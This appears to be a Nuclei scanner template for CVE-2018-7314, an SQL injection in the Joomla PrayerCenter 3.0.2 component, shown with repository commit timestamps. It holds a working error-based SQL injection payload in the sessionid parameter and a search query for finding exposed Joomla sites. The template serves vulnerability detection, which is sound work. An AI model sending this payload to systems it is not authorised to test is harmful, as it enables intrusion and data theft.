nuclei-templates/http/cves/2018/CVE-2018-7314.yaml

43 lines
1.5 KiB
YAML
Raw Normal View History

2024-04-02 06:50:57 +00:00
id: CVE-2018-7314
info:
2024-04-03 04:22:08 +00:00
name: Joomla! Component PrayerCenter 3.0.2 - SQL Injection
2024-04-02 06:50:57 +00:00
author: DhiyaneshDK
severity: critical
description: |
SQL Injection exists in the PrayerCenter 3.0.2 component for Joomla! via the sessionid parameter, a different vulnerability than CVE-2008-6429.
reference:
- https://www.exploit-db.com/exploits/44160
- https://github.com/jweny/pocassistdb
- https://github.com/0ps/pocassistdb
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2018-7314
cwe-id: CWE-89
epss-score: 0.00282
epss-percentile: 0.67968
cpe: cpe:2.3:a:mlwebtechnologies:prayercenter:3.0.2:*:*:*:*:joomla\!:*:*
metadata:
max-request: 1
vendor: mlwebtechnologies
product: prayercenter
framework: joomla\!
fofa-query: app="Joomla!-网站安装"
tags: cve,cve2018,joomla,sqli,joomla\!,mlwebtechnologies
2024-04-02 06:50:57 +00:00
variables:
num: "{{rand_int(800000000, 1000000000)}}"
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{num}})))-- X"
matchers:
- type: word
part: body
words:
- "{{md5(num)}}"
# digest: 490a004630440220722cc7f9d0e567817e7947b5b87701bcdd80c1033bfca3be769f9f9f297e8e54022017d46b1bb498cb9d02debccacc4518f31dfcba52e4db8b0f30cf3da8e38ce8f4:922c64590222798bb761d5b6d8e72950